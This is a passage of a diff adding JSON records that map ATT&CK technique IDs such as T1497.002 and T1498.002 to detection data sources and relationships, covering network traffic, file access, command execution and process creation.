This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1497.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process 
was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": 
"os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1498.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + 